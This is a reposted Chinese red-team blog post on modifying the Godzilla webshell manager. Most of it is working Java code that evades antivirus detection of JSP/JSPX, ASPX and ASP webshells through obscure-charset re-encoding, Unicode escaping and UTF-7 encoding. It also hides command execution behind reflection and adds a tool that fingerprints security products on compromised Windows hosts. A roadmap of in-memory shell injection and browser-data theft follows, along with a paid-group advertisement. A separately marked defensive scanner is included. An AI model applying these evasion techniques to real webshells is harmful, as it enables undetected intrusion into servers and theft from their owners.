Article summary: The post describes a second-pass development ("二开") of the Godzilla Special Edition (哥斯拉特战版), centred on upgrading AV evasion for jsp/jspx, aspx/asp/php WebShells by means of obscure charset encodings, heavy obfuscation and Unicode conversion to slip past detection engines; it also changes the built-in Java command-execution method and adds an AV-identification module, with encryption, post-exploitation plugins and RASP countermeasures planned next, and stresses that the material is for learning only and must not be used illegally. Overall score: 78. Categories: AV evasion, web security, penetration testing, red team, malware
Godzilla Special Edition second-pass development (哥斯拉特战版二开) - 纷传小圈
Original
zyxa
众亦信安
January 12, 2026, 11:40, Hunan
Disclaimer: The techniques and tools mentioned in this article are for learning purposes only; any illegal activity is prohibited, and any direct or indirect loss caused thereby is the sole responsibility of the user.
1: Modify jsp/jspx evasion and add the XML header encoding
The Special Edition's core evasion code lives in core/shellprocessor.
jsp/jspx evasion is split into the escapes and unicode modules, which implement "super obfuscation" and Unicode evasion respectively.
Tomcat internally supports many obscure character-set encodings. If a detection engine cannot decode such an encoding, the file is just unrecognisable garbage to it, so these niche encodings can be used to bypass it. Reference article:
https://ti.aliyun.com/#/log?id=29
The super-obfuscation logic lives in the doProcessor function of JspEscapesProcessor:
```java
public byte[] doProcessor(byte[] shell, String suffix, EscapesOptions escapesOptions) {
    this.options = escapesOptions;
    ByteBuffer byteBuffer = new ByteBuffer(shell);
    String globalCodeStartLabel = "<jsp:declaration>";
    String globalCodeEndLabel = "</jsp:declaration>";
    String codeStartLabel = "<jsp:scriptlet>";
    String codeEndLabel = "</jsp:scriptlet>";
    if ("jsp".equals(suffix)) {
        // Convert classic <%! %> / <% %> tags into the JSPX XML form.
        int jspxLabelIndex = byteBuffer.index(0, "<%!");
        if (jspxLabelIndex < 0) {
            jspxLabelIndex = byteBuffer.index(0, "<%");
        }
        byteBuffer.append("<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" version=\"1.2\">", jspxLabelIndex);
        byteBuffer.append("</jsp:root>", byteBuffer.length());
        byteBuffer.replaceFirst("<%!", globalCodeStartLabel, jspxLabelIndex);
        byteBuffer.replaceFirst("%>", globalCodeEndLabel, jspxLabelIndex);
        byteBuffer.replaceFirst("<%", codeStartLabel, jspxLabelIndex);
        byteBuffer.replaceFirst("%>", codeEndLabel, jspxLabelIndex);
    }
    // Obfuscate the declaration block and the scriptlet block separately.
    ByteBuffer globalCodeByteBuffer = byteBuffer.subMiddleBytes(globalCodeStartLabel, globalCodeEndLabel);
    ByteBuffer codeByteBuffer = byteBuffer.subMiddleBytes(codeStartLabel, codeEndLabel);
    ByteBuffer globalCodeNewByteBuffer = new ByteBuffer(this.processor(globalCodeByteBuffer.getBytes()));
    byteBuffer.replace(globalCodeByteBuffer.getBytes(), globalCodeNewByteBuffer.getBytes());
    ByteBuffer codeNewByteBuffer = new ByteBuffer(this.processor(codeByteBuffer.getBytes()));
    byteBuffer.replace(codeByteBuffer.getBytes(), codeNewByteBuffer.getBytes());
    return byteBuffer.getBytes();
}
```
Here we add the following code:
```java
// Belongs before the final return of doProcessor: re-encodes the finished JSPX in
// the chosen charset; "关闭" (off) leaves it untouched. The optional XML declaration
// tells the container which charset to decode the body with.
if (!this.options.EncodingMethod.equals("关闭")) {
    try {
        String declaration = "<?xml version=\"1.0\" encoding=\"" + this.options.EncodingMethod + "\" ?>";
        if (!this.options.isEncodingHeader) {
            declaration = "";
        }
        byte[] declarationBytes = declaration.getBytes("UTF-8");
        byte[] currentBytes = byteBuffer.getBytes();
        String content = new String(currentBytes, "UTF-8");
        byte[] ibm037Bytes = content.getBytes(this.options.EncodingMethod);
        byte[] combinedBytes = new byte[declarationBytes.length + ibm037Bytes.length];
        System.arraycopy(declarationBytes, 0, combinedBytes, 0, declarationBytes.length);
        System.arraycopy(ibm037Bytes, 0, combinedBytes, declarationBytes.length, ibm037Bytes.length);
        byteBuffer = new ByteBuffer(combinedBytes);
    } catch (UnsupportedEncodingException var15) {
        var15.printStackTrace();
    }
}
```
If this code is unclear, just paste it into an AI. Next, modify the controller flow:
```java
public static JspEscapesProcessor.EscapesOptions chooseEscapes(String[] escapesMethods) {
    JspEscapesProcessor.EscapesOptions options = new JspEscapesProcessor.EscapesOptions();
    ChooseEscapes dialog = new ChooseEscapes();
    Arrays.stream(escapesMethods).forEach((method) -> {
        dialog.escapesListComboBox.addItem(method);
    });
    // Charsets offered in the new drop-down; "关闭" (off) is the default.
    String[] IBMLIST = new String[]{"关闭", "cp037", "cp290", "utf-16le", "utf-16be", "utf-32le", "utf-32be", "IBM01145", "IBM01146"};
    Arrays.stream(IBMLIST).forEach((method) -> {
        dialog.EncodingComboBox.addItem(method);
    });
    dialog.setTitle(EasyI18N.getI18nString("混淆配置"));
    dialog.setLocationRelativeTo(MainActivity.getFrame());
    dialog.pack();
    dialog.setVisible(true);
    options.escapeMethod = dialog.escapesListComboBox.getSelectedItem().toString();
    options.EncodingMethod = dialog.EncodingComboBox.getSelectedItem().toString();
    options.isEncodingHeader = dialog.EncodingCheckBox.isSelected();
    options.isAppendLitter = dialog.isAppendLitterCheckBox.isSelected();
    options.isDoubleConfusion = dialog.isDoubleConfusionCheckBox.isSelected();
    options.isRandomConfusion = dialog.isRandomConfusionCheckBox.isSelected();
    options.minLitterNumber = Integer.parseInt(dialog.litterMinLengthTextField.getText());
    options.maxLitterNumber = Integer.parseInt(dialog.litterMaxLengthTextField.getText());
    return options;
}
```
Finally, add the UI elements:
```java
// Label: "Encoding (do not copy-paste the encoded output when transferring it)"
this.EncodingLabel = new JLabel();
this.EncodingLabel.setText("编码(编码后请勿复制粘贴传输):");
panel3.add(this.EncodingLabel, new GridConstraints(6, 0, 1, 1, 8, 0, 0, 0, (Dimension) null, (Dimension) null, (Dimension) null, 0, false));
this.EncodingComboBox = new JComboBox();
panel3.add(this.EncodingComboBox, new GridConstraints(6, 1, 1, 1, 8, 1, 2, 0, (Dimension) null, (Dimension) null, (Dimension) null, 0, false));
// Label: "Encoding header declaration (unchecking this may stop the file from being parsed)"
this.EncodingTitleLabel = new JLabel();
this.EncodingTitleLabel.setText("编码头部声明(不勾选此选项可能导致不解析):");
panel3.add(this.EncodingTitleLabel, new GridConstraints(7, 0, 1, 1, 8, 0, 0, 0, (Dimension) null, (Dimension) null, (Dimension) null, 0, false));
this.EncodingCheckBox = new JCheckBox();
this.EncodingCheckBox.setText("开启"); // "On"
this.EncodingCheckBox.setSelected(true);
```
2: Add aspx/asp/php evasion
2.1: aspx evasion
Some readers may wonder why simply creating a class in that directory is enough for it to be picked up.
Looking at the code in core/shellprocessor/StartProcessor, it scans classes, so we can define our own processors under /core/shellprocessor:
```java
static {
    // Scan core/shellprocessor for classes annotated with @GenerateProcessor and
    // register each one under every template suffix it declares.
    ApplicationContext.scanClass(ApplicationContext.class.getResource("/core/shellprocessor/"), "core.shellprocessor", ShellProcessor.class, GenerateProcessor.class).forEach((c) -> {
        GenerateProcessor processorAnnotation = (GenerateProcessor) c.getAnnotation(GenerateProcessor.class);
        Arrays.stream(processorAnnotation.superTemplate()).forEach((templateName) -> {
            LinkedHashSet classes = null;
            if (processors.containsKey(templateName)) {
                classes = (LinkedHashSet) processors.get(templateName);
            } else {
                classes = new LinkedHashSet();
                processors.put(templateName, classes);
            }
            classes.add(c);
        });
    });
}
```
Add the Unicode encoder:
```java
package core.shellprocessor.aspxUnicode;

import core.annotation.GenerateProcessor;
import core.imp.ShellProcessor;

@GenerateProcessor(DisplayName = "Unicode", superTemplate = {"aspx", "ashx", "asmx", "soap"})
public class ASPXUnicode implements ShellProcessor {
    public ASPXUnicode() {
    }

    // Rewrite every character except '.' as a \u00XX escape.
    public static String string2Unicode(String str) {
        StringBuffer unicode = new StringBuffer();
        for (int i = 0; i < str.length(); ++i) {
            char c = str.charAt(i);
            if (String.valueOf(c).equals(".")) {
                unicode.append(c);
            } else {
                unicode.append("\\u00" + Integer.toHexString(c));
            }
        }
        return unicode.toString();
    }

    // Replace the identifiers a scanner is likely to key on with their escaped form.
    public static String encoderAspx(String text) {
        String[] list = new String[]{"BinaryRead", "ContentLength", "Context.Request", "Context.Response", "Context.Session", "BinaryWrite", "ComputeHash", "CreateDecryptor", "CreateEncryptor", "Cryptography", "GetMethod", "MD5CryptoServiceProvider", "RijndaelManaged", "System.BitConverter", "System.Convert", "FromBase64String", "ToBase64String", "System.IO.MemoryStream", "System.Reflection", "Assembly", "System.Security", "System.Text.Encoding.Default.GetBytes", "System.Type", "ToString", "TransformFinalBlock", "magicNum1", "magicNum2", "CreateInstance"};
        String result = text;
        for (int i = 0; i < list.length; ++i) {
            String s = list[i];
            int index = text.indexOf(s);
            if (index != -1) {
                result = result.replace(s, string2Unicode(s));
            }
        }
        return result;
    }

    public byte[] doProcessor(byte[] shell, String suffix) {
        String shellContent = new String(shell);
        shellContent = encoderAspx(shellContent);
        return shellContent.getBytes();
    }
}
```
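A defender-side counterpart to sections 1 and 2.1, added here and not part of the original post or of Godzilla: a scanner that decodes a candidate file the way the container would (honouring the XML-declared charset, or sniffing UTF-16 when there is none) and collapses \uXXXX escapes before matching, so the cp037/UTF-16 wrapping and the ASPX Unicode rewriting no longer hide the indicators. The sample inputs, the INDICATORS list and all function names are constructed assumptions.

```python
import codecs
import re
# Constructed samples (not from the post): a JSPX body as the post's doProcessor
# wraps it, stored in cp037 behind an ASCII XML declaration, and an ASPX line
# whose "Context.Request" was rewritten as \u00XX escapes like string2Unicode does.
JSPX_BODY = ('<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">'
             '<jsp:scriptlet>/* shell body */</jsp:scriptlet></jsp:root>')
SAMPLE_JSPX = b'<?xml version="1.0" encoding="cp037" ?>' + JSPX_BODY.encode("cp037")
SAMPLE_ASPX = (b'<% var r = \\u0043\\u006f\\u006e\\u0074\\u0065\\u0078\\u0074.'
               b'\\u0052\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074; %>')

_DECL = re.compile(rb'<\?xml[^>]*encoding=["\']([A-Za-z0-9._-]+)["\']')
_UESC = re.compile(r'\\u([0-9a-fA-F]{4})')
INDICATORS = ("<jsp:scriptlet>", "<jsp:declaration>", "ProcessBuilder",
              "Context.Request", "FromBase64String", "CreateInstance")

def declared_encoding(raw: bytes):
    # Read the XML declaration from the raw prefix: the body may not be ASCII-compatible.
    m = _DECL.search(raw[:256])
    return m.group(1).decode("ascii") if m else None

def sniff_encoding(raw: bytes) -> str:
    # No declaration: check BOMs, then the null-byte pattern of UTF-16 text, else latin-1.
    for bom, name in ((codecs.BOM_UTF16_LE, "utf-16-le"), (codecs.BOM_UTF16_BE, "utf-16-be")):
        if raw.startswith(bom):
            return name
    head = raw[:64]
    if head[1::2].count(0) > len(head) // 4:
        return "utf-16-le"
    return "utf-16-be" if head[0::2].count(0) > len(head) // 4 else "latin-1"

def normalize(raw: bytes) -> str:
    # Decode the way the container would (honouring the declared charset, as Tomcat
    # does for JSPX), then collapse \uXXXX escapes so split identifiers match again.
    enc = declared_encoding(raw)
    if enc:
        end = raw.find(b"?>")
        body = raw[end + 2:] if end != -1 else raw
    else:
        enc, body = sniff_encoding(raw), raw
    try:
        text = body.decode(enc, errors="replace")
    except LookupError:  # charset unknown to this Python build: fall back to latin-1
        text = body.decode("latin-1")
    return _UESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def scan(raw: bytes) -> list:
    text = normalize(raw)
    return [ind for ind in INDICATORS if ind in text]
```

Note that a scanner which matches on the raw bytes sees neither sample's indicators; the declared-charset and escape normalisation is what makes them visible.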
2.2: asp evasion
asp works the same way: create a custom processor. Here we pick the common UTF-7:
```java
// Modified-UTF-7 style encoder: base64 of the UTF-16BE bytes, padding stripped,
// '/' swapped for ','. java.util.Base64 is reached via reflection, with the
// pre-Java-8 sun.misc encoder as a fallback.
public static String utf7_encode(String text) throws Exception {
    byte[] s = text.getBytes("utf-16be");
    String result = "";
    Class baseCls;
    try {
        baseCls = Class.forName("java.util.Base64");
        Object Encoder = baseCls.getMethod("getEncoder", (Class[]) null).invoke(baseCls, (Object[]) null);
        Class enen = Encoder.getClass();
        // encodeToString returns a String; encode(byte[]) would return byte[] and the cast would fail.
        result = (String) enen.getMethod("encodeToString", byte[].class).invoke(Encoder, s);
        result = result.replace("\n", "").replace("\r", "").replace("=", "").replace("/", ",");
    } catch (Throwable var7) {
        baseCls = Class.forName("sun.misc.BASE64Encoder");
        Object Encoder = baseCls.newInstance();
        Class enen = Encoder.getClass();
        result = (String) enen.getMethod("encode", byte[].class).invoke(Encoder, s);
        result = result.replace("\n", "").replace("\r", "").replace("=", "").replace("/", ",");
    }
    return result;
}

public static String utf7_decode(String text) throws Exception {
    text = text.replace(",", "/");
    // Restore the base64 padding that utf7_encode stripped.
    while (text.length() % 4 != 0) {
        text += "=";
    }
    byte[] data = text.getBytes();
    byte[] decodebs;
    Class baseCls;
    try {
        baseCls = Class.forName("java.util.Base64");
        Object Decoder = baseCls.getMethod("getDecoder", (Class[]) null).invoke(baseCls, (Object[]) null);
        Class dede = Decoder.getClass();
        decodebs = (byte[]) dede.getMethod("decode", byte[].class).invoke(Decoder, data);
    } catch (Throwable var7) {
        baseCls = Class.forName("sun.misc.BASE64Decoder");
        Object Decoder = baseCls.newInstance();
        Class dede = Decoder.getClass();
        decodebs = (byte[]) dede.getMethod("decodeBuffer", String.class).invoke(Decoder, new String(data));
    }
    text = new String(decodebs, "utf-16be");
    return text;
}
```
2.3: php evasion works the same way, so it is not covered item by item here.
3: Modify the built-in Java command-execution method
Extract payload.classs from the gsl payload, rename it to payload.class, open it in IDEA and find the execCommand function.
Modified command-execution code:
```java
// Replacement body for execCommand: build the command through ProcessBuilder via
// reflection. var3 holds the argument list and var2 receives the Process.
Class<?> pbClass = Class.forName("java.lang.ProcessBuilder");
java.util.List<String> cmdList = new java.util.ArrayList<>();
if (System.getProperty("os.name").toLowerCase().contains("win")) {
    cmdList.add("cmd.exe");
    cmdList.add("/c");
} else {
    cmdList.add("/bin/sh");
    cmdList.add("-c");
}
cmdList.addAll(var3);
java.lang.reflect.Constructor<?> ctor = pbClass.getConstructor(java.util.List.class);
Object pb = ctor.newInstance(cmdList);
java.lang.reflect.Method startMethod = pbClass.getMethod("start");
var2 = (Process) startMethod.invoke(pb);
```
Then recompile and package it back in.
4: Add AV identification
```java
package core.ui;

import cn.hutool.json.JSONObject;
import cn.hutool.json.JSONUtil;
import core.Encoding;
import core.annotation.DisplayName;
import core.imp.Payload;
import core.shell.ShellEntity;
import core.ui.component.DataView;
import core.ui.component.dialog.GOptionPane;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.io.IOException;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.Set;
import java.util.Vector;
import java.util.concurrent.CopyOnWriteArrayList;
import javax.swing.JButton;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import util.Log;
import util.automaticBindClick;
import util.functions;

@DisplayName(DisplayName = "杀软详情") // "AV details"
public class ShellAvscan extends JPanel {
    // Columns: index, process name, PID, AV product name
    private static final Vector COLUMNS_VECTOR = new Vector(new CopyOnWriteArrayList(new String[]{"序号", "进程名称", "PID", "杀软名称"}));
    // Unused here; apparently carried over from the port-scan panel this class was based on.
    private static final HashMap<String, String> LINUX_INET_FILE_MAPPING = new HashMap();
    private static final HashMap<String, String> LINUX_TCP_STATUS_MAPPING = new HashMap();
    private final DataView dataView;
    private final JButton getButton;
    private final JSplitPane portScanSplitPane;
    private final ShellEntity shellEntity;
    private final Payload payload;
    private Encoding encoding;

    public ShellAvscan(ShellEntity shellEntity) {
        this.shellEntity = shellEntity;
        this.payload = shellEntity.getPayloadModule();
        this.getButton = new JButton("scan");
        this.dataView = new DataView((Vector) null, COLUMNS_VECTOR, -1, -1);
        this.portScanSplitPane = new JSplitPane();
        this.portScanSplitPane.setOrientation(0);
        this.portScanSplitPane.setDividerSize(0);
        JPanel topPanel = new JPanel();
        topPanel.add(this.getButton);
        this.portScanSplitPane.setTopComponent(topPanel);
        this.portScanSplitPane.setBottomComponent(new JScrollPane(this.dataView));
        this.setLayout(new BorderLayout());
        this.add(this.portScanSplitPane);
        automaticBindClick.bindJButtonClick(this, this);
    }

    private void getButtonClick(ActionEvent actionEvent) {
        try {
            Vector rowsVector = null;
            if (!this.payload.isWindows()) {
                // "AV identification currently supports Windows only!"
                GOptionPane.showMessageDialog(this, "目前只支持Windows系统的杀软识别!", "提示", 2);
            } else {
                rowsVector = this.getWinNet();
            }
            this.dataView.AddRows(rowsVector);
        } catch (Exception var3) {
            Log.error(var3);
        }
    }

    // Match the process names in /data/av.json against the tasklist output.
    private Vector<Vector<String>> getWinNet() throws IOException {
        Vector<Vector<String>> rows = new Vector();
        String cmdResult = this.payload.execCommand("cmd.exe /c tasklist /svc").toLowerCase();
        InputStream inputStream = ShellAvscan.class.getResourceAsStream("/data/av.json");
        String ExtractBody = new String(functions.readInputStream(inputStream));
        inputStream.close();
        int i = 0;
        JSONObject jsonObject = JSONUtil.parseObj(ExtractBody);
        Set<String> keySet = jsonObject.keySet();
        for (String key : keySet) {
            String lkey = key.toLowerCase();
            String value = jsonObject.getStr(key);
            if (!cmdResult.contains(lkey)) {
                continue;
            }
            // Only count a hit at the start of a tasklist line (the image-name column).
            int index = cmdResult.indexOf(lkey);
            if (index > 0 && cmdResult.charAt(index - 1) != '\n') {
                continue;
            }
            ++i;
            // The PID is the first numeric token after the process name.
            String[] pid_tmp = cmdResult.split(lkey)[1].split(" ");
            String pid = "0";
            for (int j = 0; j < pid_tmp.length; ++j) {
                if (pid_tmp[j].length() > 0) {
                    if (functions.isNumeric(pid_tmp[j])) {
                        pid = pid_tmp[j];
                        break;
                    }
                    pid = "0";
                }
            }
            Vector<String> oneRow = new Vector();
            oneRow.add(String.valueOf(i));
            oneRow.add(key);
            oneRow.add(pid);
            if (functions.isMessyCode(value)) {
                value = new String(value.getBytes("GBK"), "utf-8");
            }
            oneRow.add(value);
            rows.add(oneRow);
        }
        return rows;
    }

    // Helpers left over from the port-scan panel; not used by the AV scan.
    private String Inet4Addr(String hex) {
        String[] strings = hex.split(":");
        String ip = linuxHexToIP(strings[0]);
        int port = functions.byteToInt2(functions.hexToByte(strings[1]));
        return ip + ":" + port;
    }

    public static String linuxHexToIP(String hexString) {
        ArrayList<String> arrayList = new ArrayList();
        for (byte b : functions.hexToByte(hexString)) {
            arrayList.add(Integer.toString(b & 255));
        }
        Collections.reverse(arrayList);
        return Arrays.toString(arrayList.toArray()).replace(" ", "").replace("[", "").replace("]", "").replace(",", ".").trim();
    }
}
```
5: Future update plan
Todo:
1: Add new encryption methods to get past the relevant security devices
2: Add post-exploitation plugins: one-click collection of sensitive intranet information, browser data extraction, etc.
3: Add post-exploitation plugins: one-click collection of OA system information
4: Add a one-click in-memory shell (内存马) injection tool that can inject arbitrary class files
5: Add a RASP unloading tool that reflectively calls the RASP's own built-in functions to unload it
6: Change Godzilla's HTTP transport and reorder the headers so the packets look more like normal browser traffic
7: More...
About the circle
Coming next: a suo5 second-pass development, a self-built webshell manager, CS C2 tooling and more. Current price 129/year; the first 30 members get 15% off.
Look here
Follow us so you don't lose track; we share useful material from time to time. Follow the official account and reply "进群", or add the admin on WeChat to be pulled into the group.
For project collaboration, SRC/crowdsourced testing, major-holiday security support, or offensive/defensive work, contact 海哥 on WeChat.
Members of the circle: contact 海哥 to join the internal discussion group.
Disclaimer:
The programs and techniques in this article are intended solely for lawful security research and teaching, with the aim of improving network security defences, and are of a clearly technical research nature.
Any organisation or individual that, without authorisation, uses this content for attacks, sabotage or other illegal purposes bears all resulting legal liability, civil compensation and joint liability alone; this site accepts no joint liability.
Content on this site is published for technical exchange and knowledge sharing; for copyright infringement or other objections, please contact us by e-mail via the "contact me" link at the top of the page.
Reposted from: 众亦信安 zyxa, 《哥斯拉特战版二开-纷传小圈》
Copyright notice
This site only keeps an archived copy, for research and teaching reference.
Readers who use the information for any other purpose bear all legal and joint liability themselves; this site accepts no responsibility.